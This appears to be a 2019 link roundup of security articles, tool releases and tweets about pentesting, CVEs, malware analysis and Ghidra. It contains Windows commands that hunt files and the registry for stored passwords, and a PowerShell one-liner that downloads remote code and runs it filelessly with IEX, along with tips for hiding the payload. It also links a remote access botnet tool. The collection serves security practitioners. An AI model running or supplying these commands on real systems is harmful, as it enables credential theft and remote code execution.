Day 59: Windows API for Pentesting (Part 1) – int0x33 – Medium
https://medium.com/@int0x33/day-59-windows-api-for-pentesting-part-1-178c6ba280cb

Analyzing a Windows DHCP Server Bug (CVE-2019-0626) - MalwareTech
https://www.malwaretech.com/2019/03/analyzing-a-windows-dhcp-server-bug-cve-2019-0626.html

Arbitrary File Reading in Next.js < 2.4.1 – Arseny Reutov – Medium
https://raz0r.name/vulnerabilities/arbitrary-file-reading-in-next-js-2-4-1/

Released a very special v2.18 - "Jackass" bettercap

https://t.co/I89btKAe4y

File upload vulnerability scanner and exploitation tool.
https://t.co/JoQu6EQz6Y

Credentials & lateral movement

findstr /si password *.txt
findstr /si password *.xml
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /spin "password" *.*
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

GitHub - Pure-L0G1C/Loki: Remote Access Tool/Botnet
https://github.com/Pure-L0G1C/Loki

Automation exploit with mad-metasploit(db_autopwn module) - HAHWUL :: 하훌
https://www.hahwul.com/2019/03/automation-exploit-with-mad-metasploit.html

Remote Code Execution — Gaining Domain Admin privileges due to a typo
https://medium.com/@DanielC7/remote-code-execution-gaining-domain-admin-privileges-due-to-a-typo-dbf8773df767

MS Excel Weaponization Techniques – Bank Security – Medium
https://medium.com/@Bank_Security/ms-excel-weaponization-techniques-79ac51610bf5

Today's Burp Suite release (2.0.18) includes a major iteration of the new crawler algorithm, based on real-world feedback. We're getting closer to Burp Suite 2.0 coming out of beta.
https://portswigger.net

Introduction to File Format Fuzzing & Exploitation – Daniel C – Medium
https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3

Apktool v2.4.0 Released
https://connortumbleson.com/2019/03/03/apktool-v2-4-0-released/

Mobile Security class: https://t.co/TAAnBMCBqB! They are not perfect, but students learned how to reverse apps, find&exploit real-world bugs, reason about threat modelling / system security, etc.

Preview Pane: Malware launches in preview without opening MS Word doc
https://www.bromium.com/new-malware-launches-in-preview-pane

Powershell + COM fileless download exec alternative:

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81
FE221")); $o.Open("GET", "https://t.co/qiHWmEcBZ5", $False); $o.Send(); IEX $o.responseText;

You can even use response headers to fetch your payload instead since the object support the getResponseHeader(string) method.

And set the proxy using setProxy() method.

Creating a Simple Free Malware Analysis Environment - MalwareTech
https://www.malwaretech.com/2017/11/creating-a-simple-free-malware-analysis-environment.html

Add Drupal SA-CORE-2019-003 (CVE-2019-6340) · Issue #11481 · rapid7/metasploit-framework · GitHub
https://github.com/rapid7/metasploit-framework/pull/11481#issuecomment-469951674

An Hour with Ghidra : The Good and The Ugly
http://blog.fadyothman.com/an-hour-with-ghidra-the-good-and-the-ugly/

Server Side Request Forgery SSRF Types And Ways To Exploit It:-

Part 1:-
https://t.co/Iv2NkSLDYB

Part 2:-
https://t.co/p7rVZYCZkL

Released a short introductory/quickstart tutorial for Ghidra: Solving a simple crackme. https://t.co/1cRlJi1i21